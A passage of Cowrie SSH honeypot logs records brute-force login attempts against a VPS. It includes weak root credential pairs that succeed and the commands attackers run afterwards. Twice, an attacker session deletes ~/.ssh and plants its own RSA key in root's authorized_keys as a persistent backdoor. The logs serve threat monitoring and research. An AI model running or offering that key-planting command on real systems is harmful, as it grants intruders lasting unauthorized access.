openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T20:56:26.760955Z","src_ip":"45.88.8.186","session":"6d3b37a2d754"}
{"eventid":"cowrie.login.success","username":"root","password":"12341234","message":"login attempt [root/12341234] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:56:28.986343Z","src_ip":"45.88.8.186","session":"6d3b37a2d754"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:56:30.321670Z","src_ip":"45.88.8.186","session":"6d3b37a2d754"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":42420,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e3bf0ba2b6a","protocol":"ssh","message":"New connection: 129.226.183.73:42420 (1.2.3.4:22) [session: 9e3bf0ba2b6a]","sensor":"my-vps","timestamp":"2025-08-24T20:56:33.224349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:56:33.231481Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:56:33.487963Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.login.success","username":"root","password":"root@888","message":"login attempt [root/root@888] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:56:34.521584Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:56:35.098914Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T20:56:35.099689Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T20:56:35.100878Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:56:35.366899Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:56:35.941369Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T20:56:35.942044Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T20:56:36.202621Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:56:36.203590Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":43694,"dst_ip":"1.2.3.4","dst_port":22,"session":"984185492c05","protocol":"ssh","message":"New connection: 129.226.183.73:43694 (1.2.3.4:22) [session: 984185492c05]","sensor":"my-vps","timestamp":"2025-08-24T20:56:36.444903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:56:36.453997Z","src_ip":"129.226.183.73","session":"984185492c05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:56:36.703013Z","src_ip":"129.226.183.73","session":"984185492c05"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T20:56:37.705148Z","src_ip":"129.226.183.73","session":"984185492c05"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:56:38.965864Z","src_ip":"129.226.183.73","session":"984185492c05"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":44904,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1832ec2d2c9","protocol":"ssh","message":"New connection: 129.226.183.73:44904 (1.2.3.4:22) [session: d1832ec2d2c9]","sensor":"my-vps","timestamp":"2025-08-24T20:56:39.229386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:56:39.230756Z","src_ip":"129.226.183.73","session":"d1832ec2d2c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:56:39.491796Z","src_ip":"129.226.183.73","session":"d1832ec2d2c9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:56:40.536279Z","src_ip":"129.226.183.73","session":"d1832ec2d2c9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:56:40.806253Z","src_ip":"129.226.183.73","session":"d1832ec2d2c9"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:56:40.807820Z","src_ip":"129.226.183.73","session":"9e3bf0ba2b6a"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":39602,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ee875ad4b22","protocol":"ssh","message":"New connection: 129.226.183.73:39602 (1.2.3.4:22) [session: 0ee875ad4b22]","sensor":"my-vps","timestamp":"2025-08-24T20:57:43.170823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:57:43.172607Z","src_ip":"129.226.183.73","session":"0ee875ad4b22"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:57:43.430816Z","src_ip":"129.226.183.73","session":"0ee875ad4b22"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"mongo","message":"login attempt [mongo/mongo] failed","sensor":"my-vps","timestamp":"2025-08-24T20:57:44.466758Z","src_ip":"129.226.183.73","session":"0ee875ad4b22"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:57:45.732749Z","src_ip":"129.226.183.73","session":"0ee875ad4b22"}
{"eventid":"cowrie.session.connect","src_ip":"1.164.219.248","src_port":41335,"dst_ip":"1.2.3.4","dst_port":23,"session":"b9a9f2cbb2c3","protocol":"telnet","message":"New connection: 1.164.219.248:41335 (1.2.3.4:23) [session: b9a9f2cbb2c3]","sensor":"my-vps","timestamp":"2025-08-24T20:58:42.350338Z"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":36784,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b350ea5258e","protocol":"ssh","message":"New connection: 129.226.183.73:36784 (1.2.3.4:22) [session: 7b350ea5258e]","sensor":"my-vps","timestamp":"2025-08-24T20:58:55.420481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:58:55.422839Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:58:55.693686Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.login.success","username":"root","password":"demo1234","message":"login attempt [root/demo1234] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:58:56.775112Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:58:57.339375Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T20:58:57.340263Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T20:58:57.341056Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:58:57.617957Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:58:58.271835Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T20:58:58.275418Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T20:58:58.551294Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:58:58.552480Z","src_ip":"129.226.183.73","session":"7b350ea5258e"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":38068,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2c2403d2af6","protocol":"ssh","message":"New connection: 129.226.183.73:38068 (1.2.3.4:22) [session: f2c2403d2af6]","sensor":"my-vps","timestamp":"2025-08-24T20:58:58.802773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:58:58.809644Z","src_ip":"129.226.183.73","session":"f2c2403d2af6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:58:59.066087Z","src_ip":"129.226.183.73","session":"f2c2403d2af6"}
{"eventid":"cowrie.session.closed","duration":"300.8","message":"Connection lost after 300.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:58:59.782005Z","src_ip":"60.221.239.232","session":"870e95c9662a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T20:59:00.096683Z","src_ip":"129.226.183.73","session":"f2c2403d2af6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:59:01.355006Z","src_ip":"129.226.183.73","session":"f2c2403d2af6"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":39178,"dst_ip":"1.2.3.4","dst_port":22,"session":"faba08c12832","protocol":"ssh","message":"New connection: 129.226.183.73:39178 (1.2.3.4:22) [session: faba08c12832]","sensor":"my-vps","timestamp":"2025-08-24T20:59:01.630443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:59:01.637335Z","src_ip":"129.226.183.73","session":"faba08c12832"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-g